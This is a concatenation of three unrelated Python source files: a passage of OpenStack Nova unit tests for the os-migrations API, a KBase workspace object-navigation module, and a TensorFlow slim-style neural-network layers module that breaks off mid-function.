'old_instance_type_id': 5,
'new_instance_type_id': 6,
'migration_type': 'resize',
'hidden': False,
'memory_total': 456789,
'memory_processed': 56789,
'memory_remaining': 45000,
'disk_total': 96789,
'disk_processed': 6789,
'disk_remaining': 96000,
'created_at': datetime.datetime(2013, 10, 22, 13, 42, 2),
'updated_at': datetime.datetime(2013, 10, 22, 13, 42, 2),
'deleted_at': None,
'deleted': False,
'uuid': uuids.migration4,
'cross_cell_move': False,
'user_id': None,
'project_id': None
}
]
migrations_obj = base.obj_make_list(
'fake-context',
objects.MigrationList(),
objects.Migration,
fake_migrations)
class FakeRequest(object):
environ = {"nova.context": context.RequestContext('fake_user',
fakes.FAKE_PROJECT_ID,
is_admin=True)}
GET = {}
class MigrationsTestCaseV21(test.NoDBTestCase):
migrations = migrations_v21
def _migrations_output(self):
return self.controller._output(self.req, migrations_obj)
def setUp(self):
"""Run before each test."""
super(MigrationsTestCaseV21, self).setUp()
self.controller = self.migrations.MigrationsController()
self.req = fakes.HTTPRequest.blank('', use_admin_context=True)
self.context = self.req.environ['nova.context']
def test_index(self):
migrations_in_progress = {'migrations': self._migrations_output()}
for mig in migrations_in_progress['migrations']:
self.assertIn('id', mig)
self.assertNotIn('deleted', mig)
self.assertNotIn('deleted_at', mig)
self.assertNotIn('links', mig)
filters = {'host': 'host1', 'status': 'migrating',
'instance_uuid': uuids.instance1,
'source_compute': 'host1', 'hidden': '0',
'migration_type': 'resize'}
# python-novaclient actually supports sending this even though it's
# not used in the DB API layer and is totally useless. This lets us,
# however, test that additionalProperties=True allows it.
unknown_filter = {'cell_name': 'ChildCell'}
self.req.GET.update(filters)
self.req.GET.update(unknown_filter)
with mock.patch.object(self.controller.compute_api,
'get_migrations',
return_value=migrations_obj) as (
mock_get_migrations
):
response = self.controller.index(self.req)
self.assertEqual(migrations_in_progress, response)
# Only with the filters, and the unknown filter is stripped
mock_get_migrations.assert_called_once_with(self.context, filters)
def test_index_query_allow_negative_int_as_string(self):
migrations = {'migrations': self._migrations_output()}
filters = ['host', 'status', 'cell_name', 'instance_uuid',
'source_compute', 'hidden', 'migration_type']
with mock.patch.object(self.controller.compute_api,
'get_migrations',
return_value=migrations_obj):
for fl in filters:
req = fakes.HTTPRequest.blank('/os-migrations',
use_admin_context=True,
query_string='%s=-1' % fl)
response = self.controller.index(req)
self.assertEqual(migrations, response)
def test_index_query_duplicate_query_parameters(self):
migrations = {'migrations': self._migrations_output()}
params = {'host': 'host1', 'status': 'migrating',
'cell_name': 'ChildCell', 'instance_uuid': uuids.instance1,
'source_compute': 'host1', 'hidden': '0',
'migration_type': 'resize'}
with mock.patch.object(self.controller.compute_api,
'get_migrations',
return_value=migrations_obj):
for k, v in params.items():
req = fakes.HTTPRequest.blank(
'/os-migrations', use_admin_context=True,
query_string='%s=%s&%s=%s' % (k, v, k, v))
response = self.controller.index(req)
self.assertEqual(migrations, response)
class MigrationsTestCaseV223(MigrationsTestCaseV21):
wsgi_api_version = '2.23'
def setUp(self):
"""Run before each test."""
super(MigrationsTestCaseV223, self).setUp()
self.req = fakes.HTTPRequest.blank(
'', version=self.wsgi_api_version, use_admin_context=True)
def test_index(self):
migrations = {'migrations': self.controller._output(
self.req, migrations_obj, True)}
for i, mig in enumerate(migrations['migrations']):
# first item is in-progress live migration
if i == 0:
self.assertIn('links', mig)
else:
self.assertNotIn('links', mig)
self.assertIn('migration_type', mig)
self.assertIn('id', mig)
self.assertNotIn('deleted', mig)
self.assertNotIn('deleted_at', mig)
with mock.patch.object(self.controller.compute_api,
'get_migrations') as m_get:
m_get.return_value = migrations_obj
response = self.controller.index(self.req)
self.assertEqual(migrations, response)
self.assertIn('links', response['migrations'][0])
self.assertIn('migration_type', response['migrations'][0])
class MigrationsTestCaseV259(MigrationsTestCaseV223):
wsgi_api_version = '2.59'
def test_index(self):
migrations = {'migrations': self.controller._output(
self.req, migrations_obj, True, True)}
for i, mig in enumerate(migrations['migrations']):
# first item is in-progress live migration
if i == 0:
self.assertIn('links', mig)
else:
self.assertNotIn('links', mig)
self.assertIn('migration_type', mig)
self.assertIn('id', mig)
self.assertIn('uuid', mig)
self.assertNotIn('deleted', mig)
self.assertNotIn('deleted_at', mig)
with mock.patch.object(self.controller.compute_api,
'get_migrations_sorted') as m_get:
m_get.return_value = migrations_obj
response = self.controller.index(self.req)
self.assertEqual(migrations, response)
self.assertIn('links', response['migrations'][0])
self.assertIn('migration_type', response['migrations'][0])
@mock.patch('nova.compute.api.API.get_migrations_sorted')
def test_index_with_invalid_marker(self, mock_migrations_get):
"""Tests detail paging with an invalid marker (not found)."""
mock_migrations_get.side_effect = exception.MarkerNotFound(
marker=uuids.invalid_marker)
req = fakes.HTTPRequest.blank(
'/os-migrations?marker=%s' % uuids.invalid_marker,
version=self.wsgi_api_version, use_admin_context=True)
e = self.assertRaises(exc.HTTPBadRequest,
self.controller.index, req)
self.assertEqual(
"Marker %s could not be found." % uuids.invalid_marker,
six.text_type(e))
def test_index_with_invalid_limit(self):
"""Tests detail paging with an invalid limit."""
req = fakes.HTTPRequest.blank(
'/os-migrations?limit=x', version=self.wsgi_api_version,
use_admin_context=True)
self.assertRaises(exception.ValidationError,
self.controller.index, req)
req = fakes.HTTPRequest.blank(
'/os-migrations?limit=-1', version=self.wsgi_api_version,
use_admin_context=True)
self.assertRaises(exception.ValidationError,
self.controller.index, req)
def test_index_with_invalid_changes_since(self):
"""Tests detail paging with an invalid changes-since value."""
req = fakes.HTTPRequest.blank(
'/os-migrations?changes-since=wrong_time',
version=self.wsgi_api_version, use_admin_context=True)
self.assertRaises(exception.ValidationError,
self.controller.index, req)
def test_index_with_unknown_query_param(self):
"""Tests detail paging with an unknown query parameter."""
req = fakes.HTTPRequest.blank(
'/os-migrations?foo=bar',
version=self.wsgi_api_version, use_admin_context=True)
ex = self.assertRaises(exception.ValidationError,
self.controller.index, req)
self.assertIn('Additional properties are not allowed',
six.text_type(ex))
@mock.patch('nova.compute.api.API.get_migrations',
return_value=objects.MigrationList())
def test_index_with_changes_since_old_microversion(self, get_migrations):
"""Tests that the changes-since query parameter is ignored before
microversion 2.59.
"""
# Also use a valid filter (instance_uuid) to make sure only
# changes-since is removed.
req = fakes.HTTPRequest.blank(
'/os-migrations?changes-since=2018-01-10T16:59:24.138939&'
'instance_uuid=%s' % uuids.instance_uuid,
version='2.58', use_admin_context=True)
result = self.controller.index(req)
self.assertEqual({'migrations': []}, result)
get_migrations.assert_called_once_with(
req.environ['nova.context'],
{'instance_uuid': uuids.instance_uuid})
class MigrationTestCaseV266(MigrationsTestCaseV259):
wsgi_api_version = '2.66'
def test_index_with_invalid_changes_before(self):
"""Tests detail paging with an invalid changes-before value."""
req = fakes.HTTPRequest.blank(
'/os-migrations?changes-before=wrong_time',
version=self.wsgi_api_version, use_admin_context=True)
self.assertRaises(exception.ValidationError,
self.controller.index, req)
@mock.patch('nova.compute.api.API.get_migrations_sorted',
return_value=objects.MigrationList())
def test_index_with_changes_since_and_changes_before(
self, get_migrations_sorted):
changes_since = '2013-10-22T13:42:02Z'
changes_before = '2013-10-22T13:42:03Z'
req = fakes.HTTPRequest.blank(
'/os-migrations?changes-since=%s&changes-before=%s&'
'instance_uuid=%s'
% (changes_since, changes_before, uuids.instance_uuid),
version=self.wsgi_api_version,
use_admin_context=True)
self.controller.index(req)
search_opts = {'instance_uuid': uuids.instance_uuid,
'changes-before':
datetime.datetime(2013, 10, 22, 13, 42, 3,
tzinfo=iso8601.iso8601.UTC),
'changes-since':
datetime.datetime(2013, 10, 22, 13, 42, 2,
tzinfo=iso8601.iso8601.UTC)}
get_migrations_sorted.assert_called_once_with(
req.environ['nova.context'], search_opts, sort_dirs=mock.ANY,
sort_keys=mock.ANY, limit=1000, marker=None)
def test_get_migrations_filters_with_distinct_changes_time_bad_request(
self):
changes_since = '2018-09-04T05:45:27Z'
changes_before = '2018-09-03T05:45:27Z'
req = fakes.HTTPRequest.blank('/os-migrations?'
'changes-since=%s&changes-before=%s' %
(changes_since, changes_before),
version=self.wsgi_api_version,
use_admin_context=True)
ex = self.assertRaises(exc.HTTPBadRequest, self.controller.index, req)
self.assertIn('The value of changes-since must be less than '
'or equal to changes-before', six.text_type(ex))
def test_index_with_changes_before_old_microversion_failed(self):
"""Tests that the changes-before query parameter is an error before
microversion 2.66.
"""
# Also use a valid filter (instance_uuid) to make sure
# changes-before is an additional property.
req = fakes.HTTPRequest.blank(
'/os-migrations?changes-before=2018-01-10T16:59:24.138939&'
'instance_uuid=%s' % uuids.instance_uuid,
version='2.65', use_admin_context=True)
ex = self.assertRaises(exception.ValidationError,
self.controller.index, req)
self.assertIn('Additional properties are not allowed',
six.text_type(ex))
@mock.patch('nova.compute.api.API.get_migrations',
return_value=objects.MigrationList())
def test_index_with_changes_before_old_microversion(self, get_migrations):
"""Tests that the changes-before query parameter is ignored before
microversion 2.59.
"""
# Also use a valid filter (instance_uuid) to make sure only
# changes-before is removed.
req = fakes.HTTPRequest.blank(
'/os-migrations?changes-before=2018-01-10T16:59:24.138939&'
'instance_uuid=%s' % uuids.instance_uuid,
version='2.58', use_admin_context=True)
result = self.controller.index(req)
self.assertEqual({'migrations': []}, result)
get_migrations.assert_called_once_with(
req.environ['nova.context'],
{'instance_uuid': uuids.instance_uuid})
class MigrationsTestCaseV280(MigrationTestCaseV266):
wsgi_api_version = '2.80'
def test_index(self):
migrations = {'migrations': self.controller._output(
self.req, migrations_obj,
add_link=True, add_uuid=True,
add_user_project=True)}
for i, mig in enumerate(migrations['migrations']):
# first item is in-progress live migration
if i == 0:
self.assertIn('links', mig)
else:
self.assertNotIn('links', mig)
self.assertIn('migration_type', mig)
self.assertIn('id', mig)
self.assertIn('uuid', mig)
self.assertIn('user_id', mig)
self.assertIn('project_id', mig)
self.assertNotIn('deleted', mig)
self.assertNotIn('deleted_at', mig)
with mock.patch.object(self.controller.compute_api,
'get_migrations_sorted') as m_get:
m_get.return_value = migrations_obj
response = self.controller.index(self.req)
self.assertEqual(migrations, response)
self.assertIn('links', response['migrations'][0])
self.assertIn('migration_type', response['migrations'][0])
def test_index_filter_by_user_id_pre_v280(self):
"""Tests that the migrations by user_id query parameter
is not allowed before microversion 2.80.
"""
req = fakes.HTTPRequest.blank(
'/os-migrations?user_id=%s' % uuids.user_id,
version='2.79', use_admin_context=True)
ex = self.assertRaises(exception.ValidationError,
self.controller.index, req)
self.assertIn('Additional properties are not allowed',
six.text_type(ex))
def test_index_filter_by_project_id_pre_v280(self):
"""Tests that the migrations by project_id query parameter
is not allowed before microversion 2.80.
"""
req = fakes.HTTPRequest.blank(
'/os-migrations?project_id=%s' % uuids.project_id,
version='2.79', use_admin_context=True)
ex = self.assertRaises(exception.ValidationError,
self.controller.index, req)
self.assertIn('Additional properties are not allowed',
six.text_type(ex))
class MigrationsPolicyEnforcement(test.NoDBTestCase):
def setUp(self):
super(MigrationsPolicyEnforcement, self).setUp()
self.controller = migrations_v21.MigrationsController()
self.req = fakes.HTTPRequest.blank('')
def test_list_policy_failed(self):
rule_name = "os_compute_api:os-migrations:index"
self.policy.set_rules({rule_name: "project_id:non_fake"})
exc = self.assertRaises(
exception.PolicyNotAuthorized,
self.controller.index, self.req)
self.assertEqual(
"Policy doesn't allow %s to be performed." % rule_name,
exc.format_message())
class MigrationsPolicyEnforcementV223(MigrationsPolicyEnforcement):
wsgi_api_version = '2.23'
def setUp(self):
super(MigrationsPolicyEnforcementV223, self).setUp()
self.req = fakes.HTTPRequest.blank('', version=self.wsgi_api_version)
class MigrationsPolicyEnforcementV259(MigrationsPolicyEnforcementV223):
wsgi_api_version = '2.59'
class MigrationsPolicyEnforcementV280(MigrationsPolicyEnforcementV259):
wsgi_api_version = '2.80'
|
|
"""
Navigation of object containers (e.g. workspaces).
The primary class is 'Finder'::
from doekbase.data_api import nav
finder = nav.Finder(...) # see class docs for args and usage
"""
__author__ = 'Dan Gunter <dkgunter@lbl.gov>'
__date__ = '7/30/15'
# System
from collections import namedtuple
import glob
import os
import re
# Local
import doekbase
import doekbase.workspace.client
# the types module is being removed:
#from doekbase.data_api.types import get_object_class
def get_object_class(type_pattern):
# XXX: This should return the class for a given type pattern
return None
def add_dicts(a, b):
"""Add two dictionaries together and return a third."""
c = a.copy()
c.update(b)
return c
## Make a simply-accessed object for object_metadata from workspace API
_ObjectInfo = namedtuple('_ObjectInfo',
'objid,name,type,save_date,version,saved_by,wsid,'
'workspace,chsum,size,meta')
class ObjectInfo(_ObjectInfo):
"""Metadata about one object."""
def set_conn(self, conn):
self._conn = conn
return self # for chaining
@property
def data(self):
"""Get full, raw, data from its metadata."""
return self._conn.get_object(self.objid)
@property
def object(self):
"""Get wrapped KBase data object from the metadata."""
clazz = get_object_class(self.type)
if clazz is None:
raise RuntimeError('Internal error: Cannot get any class '
'for type "{}"'.format(self.name))
kwparams = self._conn.get_objectapi_params(self.objid)
return clazz(**kwparams)
class DBConnection(object):
"""Database connection."""
DEFAULT_WS_URL = 'https://ci.kbase.us/services/ws/'
DEFAULT_SHOCK_URL = 'https://ci.kbase.us/services/shock-api/'
def __init__(self, workspace=None, auth_token=None, ws_url=None, shock_url=None):
if workspace is None:
raise ValueError("Workspace id, e.g. 1003, required")
try:
self._ws = int(workspace)
self._ws_param = {'ids': [self._ws]}
except ValueError:
raise ValueError("Workspace id must be an integer")
if auth_token is None:
try:
varname = 'KB_AUTH_TOKEN'
auth_token = os.environ[varname]
except IndexError:
raise ValueError('Unable to authorize. No '
'value given for auth_token and '
'environment variable {} not found'.
format(varname))
if ws_url is None:
ws_url = self.DEFAULT_WS_URL
if shock_url is None:
shock_url = self.DEFAULT_SHOCK_URL
self._ws_url = ws_url
self._shock_url = shock_url
self.client = doekbase.workspace.client.Workspace(ws_url,
token=auth_token)
def get_objectapi_params(self, objid):
"""Get back the params that the Data ctor wants, as
a dictionary with the correct keyword arguments set.
"""
return dict(services={'workspace_service_url': self._ws_url,
'shock_service_url': self._shock_url},
ref='{}/{}'.format(self._ws, objid))
def get_workspace(self):
return str(self._ws)
def list_objects(self):
"""List all objects in workspace.
Return:
list of ObjectInfo
"""
objlist = self.client.list_objects(self._ws_param)
return [ObjectInfo._make(o).set_conn(self) for o in objlist]
def get_object(self, objid):
"""Get an object in the workspace.
TODO: Make this work!!
"""
oid = {'wsid': self._ws, 'objid': objid}
params = [oid]
obj = self.client.get_objects(params)
return obj
class Finder(object):
"""Find objects.
Initialize with a DBConnection object:
f = Finder(DBConnection(workspace=1122))
You can use indexing to look up objects by name:
f['kb|contigset.12523']
The name can contain Unix glob characters (e.g. "*"):
f['Rhodobacter*']
You can also look up objects by position
f[0]
You can look up an object by arbitrary attributes by
passing a dict-like object (anything with an 'items' method) as the index
f[dict(type='KBaseGenomes.ContigSet-2.0')]
Use list() to see all objects:
print(list(f))
"""
def __init__(self, conn, cache=True):
"""Ctor.
Args:
conn - DBConnection object
cache - If True (the default), cache objects and don't
contact the server again. If False, contact the
server every time.
"""
if not hasattr(conn, 'client'):
raise ValueError('Input "conn" parameter does not look like '
'a DBConnection object; no "client" attribute '
'found')
self._client = conn
self._objlist = None
self._force_refresh = not cache
self._ws_name = conn.get_workspace()
self._globmatch = glob.fnmatch.fnmatchcase
def _set_objlist(self):
if self._force_refresh or self._objlist is None:
self._objlist = self._client.list_objects()
def ls(self):
"""List objects in the current container namespace.
Returns:
list of objects, each in the same form returned by the indexing
operations.
"""
return list(self)
def filter(self, objid=None, name=None, name_re=None, type_=None,
type_re=None, type_ver=None, **kw):
"""Return a filtered subset of the contained objects.
Args:
objid (int): Object identifier
name (str): Exact match name
name_re (str): Regular expression match name
type_ (str): Exact match type
type_re (str): Regular expression match type
type_ver (tuple): Match on string type and str version comparator
kw (dict): Names and values, matched as exact strings. If the
name is not in the record, it is ignored.
"""
if name_re is not None and name is not None:
raise ValueError('keywords "name_re" and "name" cannot both be given')
if sum(map(bool, (type_re, type_, type_ver))) > 1:
raise ValueError(
'keywords "type_re", "type", and "type_ver" are exclusive')
result = []
for o in list(self):
if objid is not None:
if o.objid != objid:
continue
if name_re is not None:
if not re.match(name_re, o.name):
continue
elif name is not None:
if name != o.name:
continue
if type_re is not None:
if not re.match(type_re, o.type):
continue
elif type_ is not None:
if type_ != o.type:
continue
kwmatch = True
for k, v in kw:
if k in o:
if o[k] != v:
kwmatch = False
break
if not kwmatch:
continue
result.append(o)
return result
def __getitem__(self, item):
"""Indexing."""
self._set_objlist()
if isinstance(item, int):
return self._objlist[item]
elif hasattr(item, 'items'): # dict-like
for o in self._objlist:
matched = True
for k, v in item.items():
if getattr(o, k, None) != v:
matched = False
break
if matched:
return o
raise KeyError('Object with attributes ({}) not found '
'in workspace {}'.
format(item, self._ws_name))
else:
for o in self._objlist:
if o.name == item:
return o
elif self._globmatch(o.name, item):
return o
raise KeyError('Object with name "{}" not found in workspace {}'.
format(item, self._ws_name))
|
|
# Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Contains convenience wrappers for typical Neural Network TensorFlow layers.
Additionally it maintains a collection with update_ops that need to be
updated after the ops have been computed, for exmaple to update moving means
and moving variances of batch_norm.
Ops that have different behavior during training or eval have an is_training
parameter. Additionally Ops that contain variables.variable have a trainable
parameter, which control if the ops variables are trainable or not.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow as tf
from tensorflow.python.training import moving_averages
from piecewisecrf.slim import losses
from piecewisecrf.slim import scopes
from piecewisecrf.slim import variables
# Used to keep the update ops done by batch_norm.
UPDATE_OPS_COLLECTION = '_update_ops_'
@scopes.add_arg_scope
def batch_norm(inputs,
decay=0.999,
center=True,
scale=False,
epsilon=0.001,
moving_vars='moving_vars',
activation=None,
is_training=True,
trainable=True,
restore=True,
scope=None,
reuse=None):
"""Adds a Batch Normalization layer.
Args:
inputs: a tensor of size [batch_size, height, width, channels]
or [batch_size, channels].
decay: decay for the moving average.
center: If True, subtract beta. If False, beta is not created and ignored.
scale: If True, multiply by gamma. If False, gamma is
not used. When the next layer is linear (also e.g. ReLU), this can be
disabled since the scaling can be done by the next layer.
epsilon: small float added to variance to avoid dividing by zero.
moving_vars: collection to store the moving_mean and moving_variance.
activation: activation function.
is_training: whether or not the model is in training mode.
trainable: whether or not the variables should be trainable or not.
restore: whether or not the variables should be marked for restore.
scope: Optional scope for variable_op_scope.
reuse: whether or not the layer and its variables should be reused. To be
able to reuse the layer scope must be given.
Returns:
a tensor representing the output of the operation.
"""
inputs_shape = inputs.get_shape()
with tf.variable_op_scope([inputs], scope, 'BatchNorm', reuse=reuse):
axis = list(range(len(inputs_shape) - 1))
params_shape = inputs_shape[-1:]
# Allocate parameters for the beta and gamma of the normalization.
beta, gamma = None, None
if center:
beta = variables.variable('beta',
params_shape,
initializer=tf.zeros_initializer,
trainable=trainable,
restore=restore)
if scale:
gamma = variables.variable('gamma',
params_shape,
initializer=tf.ones_initializer,
trainable=trainable,
restore=restore)
# Create moving_mean and moving_variance add them to
# GraphKeys.MOVING_AVERAGE_VARIABLES collections.
moving_collections = [moving_vars, tf.GraphKeys.MOVING_AVERAGE_VARIABLES]
moving_mean = variables.variable('moving_mean',
params_shape,
initializer=tf.zeros_initializer,
trainable=False,
restore=restore,
collections=moving_collections)
moving_variance = variables.variable('moving_variance',
params_shape,
initializer=tf.ones_initializer,
trainable=False,
restore=restore,
collections=moving_collections)
if is_training:
# Calculate the moments based on the individual batch.
mean, variance = tf.nn.moments(inputs, axis)
update_moving_mean = moving_averages.assign_moving_average(
moving_mean, mean, decay)
tf.add_to_collection(UPDATE_OPS_COLLECTION, update_moving_mean)
update_moving_variance = moving_averages.assign_moving_average(
moving_variance, variance, decay)
tf.add_to_collection(UPDATE_OPS_COLLECTION, update_moving_variance)
else:
# Just use the moving_mean and moving_variance.
mean = moving_mean
variance = moving_variance
# Normalize the activations.
if is_training:
with tf.control_dependencies([update_moving_mean, update_moving_variance]):
outputs = tf.nn.batch_normalization(
inputs, mean, variance, beta, gamma, epsilon)
outputs.set_shape(inputs.get_shape())
if activation:
outputs = activation(outputs)
return outputs
else:
outputs = tf.nn.batch_normalization(
inputs, mean, variance, beta, gamma, epsilon)
outputs.set_shape(inputs.get_shape())
if activation:
outputs = activation(outputs)
return outputs
def _two_element_tuple(int_or_tuple):
"""Converts `int_or_tuple` to height, width.
Several of the functions that follow accept arguments as either
a tuple of 2 integers or a single integer. A single integer
indicates that the 2 values of the tuple are the same.
This functions normalizes the input value by always returning a tuple.
Args:
int_or_tuple: A list of 2 ints, a single int or a tf.TensorShape.
Returns:
A tuple with 2 values.
Raises:
ValueError: If `int_or_tuple` it not well formed.
"""
if isinstance(int_or_tuple, (list, tuple)):
if len(int_or_tuple) != 2:
raise ValueError('Must be a list with 2 elements: %s' % int_or_tuple)
return int(int_or_tuple[0]), int(int_or_tuple[1])
if isinstance(int_or_tuple, int):
return int(int_or_tuple), int(int_or_tuple)
if isinstance(int_or_tuple, tf.TensorShape):
if len(int_or_tuple) == 2:
return int_or_tuple[0], int_or_tuple[1]
raise ValueError('Must be an int, a list with 2 elements or a TensorShape of '
'length 2')
@scopes.add_arg_scope
def conv2d(inputs,
num_filters_out,
kernel_size,
stride=1,
padding='SAME',
activation=tf.nn.relu,
stddev=0.01,
bias=0.0,
weight_decay=0,
batch_norm_params=None,
is_training=True,
trainable=True,
restore=True,
scope=None,
reuse=None,
init=None):
"""Adds a 2D convolution followed by an optional batch_norm layer.
conv2d creates a variable called 'weights', representing the convolutional
kernel, that is convolved with the input. If `batch_norm_params` is None, a
second variable called 'biases' is added to the result of the convolution
operation.
Args:
inputs: a tensor of size [batch_size, height, width, channels].
num_filters_out: the number of output filters.
kernel_size: a list of length 2: [kernel_height, kernel_width] of
of the filters. Can be an int if both values are the same.
stride: a list of length 2: [stride_height, stride_width].
Can be an int if both strides are the same. Note that presently
both strides must have the same value.
padding: one of 'VALID' or 'SAME'.
activation: activation function.
stddev: standard deviation of the truncated guassian weight distribution.
bias: the initial value of the biases.
weight_decay: the weight decay.
batch_norm_params: parameters for the batch_norm. If is None don't use it.
is_training: whether or not the model is in training mode.
trainable: whether or not the variables should be trainable or not.
restore: whether or not the variables should be marked for restore.
scope: Optional scope for variable_op_scope.
reuse: whether or not the layer and its variables should be reused. To be
able to reuse the layer scope must be given.
Returns:
a tensor representing the output of the operation.
"""
with tf.variable_op_scope([inputs], scope, 'Conv', reuse=reuse):
kernel_h, kernel_w = _two_element_tuple(kernel_size)
stride_h, stride_w = _two_element_tuple(stride)
num_filters_in = inputs.get_shape()[-1]
weights_shape = [kernel_h, kernel_w,
num_filters_in, num_filters_out]
weights_initializer = None
if init == None:
weights_initializer = tf.truncated_normal_initializer(stddev=stddev)
else:
weights_initializer = tf.constant(init['weights'])
weights_shape = None
l2_regularizer = None
if weight_decay and weight_decay > 0:
l2_regularizer = losses.l2_regularizer(weight_decay)
weights = variables.variable('weights',
shape=weights_shape,
initializer=weights_initializer,
regularizer=l2_regularizer,
trainable=trainable,
restore=restore)
conv = tf.nn.conv2d(inputs, weights, [1, stride_h, stride_w, 1],
padding=padding)
if batch_norm_params is not None:
with scopes.arg_scope([batch_norm], is_training=is_training,
trainable=trainable, restore=restore):
outputs = batch_norm(conv, **batch_norm_params)
else:
bias_shape = [num_filters_out,]
bias_initializer = None
if init == None:
bias_initializer = tf.constant_initializer(bias)
else:
bias_initializer = tf.constant(init['biases'])
bias_shape = None
biases = variables.variable('biases',
shape=bias_shape,
initializer=bias_initializer,
trainable=trainable,
restore=restore)
outputs = tf.nn.bias_add(conv, biases)
if activation:
outputs = activation(outputs)
return outputs
@scopes.add_arg_scope
def fc(inputs,
num_units_out,
activation=tf.nn.relu,
stddev=0.01,
bias=0.0,
weight_decay=0,
batch_norm_params=None,
is_training=True,
trainable=True,
restore=True,
scope=None,
reuse=None):
"""Adds a fully connected layer followed by an optional batch_norm layer.
FC creates a variable called 'weights', representing the fully connected
weight matrix, that is multiplied by the input. If `batch_norm` is None, a
second variable called 'biases' is added to the result of the initial
vector-matrix multiplication.
Args:
inputs: a [B x N] tensor where B is the batch size and N is the number of
input units in the layer.
num_units_out: the number of output units in the layer.
activation: activation function.
stddev: the standard deviation for the weights.
bias: the initial value of the biases.
weight_decay: the weight decay.
batch_norm_params: parameters for the batch_norm. If is None don't use it.
is_training: whether or not the model is in training mode.
trainable: whether or not the variables should be trainable or not.
restore: whether or not the variables should be marked for restore.
scope: Optional scope for variable_op_scope.
reuse: whether or not the layer and its variables should be reused. To be
able to reuse the layer scope must be given.
Returns:
the tensor variable representing the result of the series of operations.
"""
with tf.variable_op_scope([inputs], scope, 'FC', reuse=reuse):
num_units_in = inputs.get_shape()[1]
weights_shape = [num_units_in, num_units_out]
weights_initializer = tf.truncated_normal_initializer(stddev=stddev)
l2_regularizer = None
if weight_decay and weight_decay > 0:
l2_regularizer = losses.l2_regularizer(weight_decay)
weights = variables.variable('weights',
shape=weights_shape,
initializer=weights_initializer,
regularizer=l2_regularizer,
trainable=trainable,
restore=restore)
if batch_norm_params is not None:
outputs = tf.matmul(inputs, weights)
with scopes.arg_scope([batch_norm], is_training=is_training,
trainable=trainable, restore=restore):
outputs = batch_norm(outputs, **batch_norm_params)
else:
bias_shape = [num_units_out,]
bias_initializer = tf.constant_initializer(bias)
biases = variables.variable('biases',
shape=bias_shape,
initializer=bias_initializer,
trainable=trainable,
restore=restore)
outputs = tf.nn.xw_plus_b(inputs, weights, biases)
if activation:
outputs = activation(outputs)
return outputs
def one_hot_encoding(labels, num_classes, scope=None):
"""Transform numeric labels into onehot_labels.
Args:
labels: [batch_size] target labels.
num_classes: total number of classes.
scope: Optional scope for op_scope.
Returns:
one hot encoding of the labels.
"""
with tf.op_scope([labels], scope, 'OneHotEncoding'):
batch_size = labels.get_shape()[0]
indices = tf.expand_dims(tf.range(0, batch_size), 1)
labels = tf.cast(tf.expand_dims(labels, 1), indices.dtype)
concated = tf.concat(1, [indices, labels])
onehot_labels = tf.sparse_to_dense(
concated, tf.pack([batch_size, num_classes]), 1.0, 0.0)
onehot_labels.set_shape([batch_size, num_classes])
return onehot_labels
@scopes.add_arg_scope
def max_pool(inputs, kernel_size, stride=2, padding='VALID', scope=None):
"""Adds a Max Pooling layer.
It is assumed by the wrapper that the pooling is only done per image and not
in depth or batch.
Args:
inputs: a tensor of size [batch_size, height, width, depth].
kernel_size: a list of length 2: [kernel_height, kernel_width] of the
pooling kernel over which the op is computed. Can be an int if both
values are the same.
stride: a list of length 2: [stride_height, stride_width].
Can be an int if both strides are the same. Note that presently
both strides must have the same value.
padding: the padding method, either 'VALID' or 'SAME'.
scope: Optional scope for op_scope.
Returns:
a tensor representing the results of the pooling operation.
Raises:
ValueError: if 'kernel_size' is not a 2-D list
"""
with tf.op_scope([inputs], scope, 'MaxPool'):
kernel_h, kernel_w = _two_element_tuple(kernel_size)
stride_h, stride_w = _two_element_tuple(stride)
return tf.nn.max_pool(inputs,
ksize=[1, kernel_h, kernel_w, 1],
strides=[1, stride_h, stride_w, 1],
padding=padding)
@scopes.add_arg_scope
def avg_pool(inputs, kernel_size, stride=2, padding='VALID', scope=None):
"""Adds a Avg Pooling layer.
It is assumed by the wrapper that the pooling is only done per image and not
in depth or batch.
Args:
inputs: a tensor of size [batch_size, height, width, depth].
kernel_size: a list of length 2: [kernel_height, kernel_width] of the
pooling kernel over which the op is computed. Can be an int if both
values are the same.
stride: a list of length 2: [stride_height, stride_width].
Can be an int if both strides are the same. Note that presently
both strides must have the same value.
padding: the padding method, either 'VALID' or 'SAME'.
scope: Optional scope for op_scope.
Returns:
a tensor representing the results of the pooling operation.
"""
with tf.op_scope([inputs], scope, 'AvgPool'):
kernel_h, kernel_w = _two_element_tuple(kernel_size)
stride_h, stride_w = _two_element_tuple(stride)
return tf.nn.avg_pool(inputs,
ksize=[1, kernel_h, kernel_w, 1],
strides=[1, stride_h, stride_w, 1],
padding=padding)
@scopes.add_arg_scope
def dropout(inputs, keep_prob=0.5, is_training=True, scope=None):
"""Returns a dropout layer applied to the input.
Args:
inputs: the tensor to pass to the Dropout layer.
keep_prob: the probability of keeping each input unit.
is_training: whether or not the model is in training mode. If so, dropout is
applied and values scaled. Otherwise, inputs is returned.
scope: Optional scope for op_scope.
Returns:
a tensor representing the output of the operation.
"""
if is_training and keep_prob > 0:
with tf.op_scope([inputs], scope, 'Dropout'):
return tf.nn.dropout(inputs, keep_prob)
else:
return inputs
def flatten(inputs, scope=None):
"""Flattens the input while maintaining the batch_size.
Assumes that the first dimension represents the batch.
Args:
inputs: a tensor of size [batch_size, ...].
scope: Optional scope for op_scope.
Returns:
a flattened tensor with shape [batch_size, k].
Raises:
ValueError: if inputs.shape is wrong.
"""
if len(inputs.get_shape()) < 2:
raise ValueError('Inputs must be have a least 2 dimensions')
dims = inputs.get_shape()[1:]
k = dims.num_elements()
with tf.op_scope([inputs], scope, 'Flatten'):
return tf.reshape(inputs, [-1, k])
def repeat_op(repetitions, inputs, op, *args, **kwargs):
"""Build a sequential Tower starting from inputs by using an op repeatedly.
It creates new scopes for each operation by increasing the counter.
Example: given repeat_op(3, _, ops.conv2d, 64, [3, 3], scope='conv1')
it will repeat the given op under the following variable_scopes:
conv1/Conv
conv1/Conv_1
conv1/Conv_2
Args:
repetitions: number or repetitions.
inputs: a tensor of size [batch_size, height, width, channels].
op: an operation.
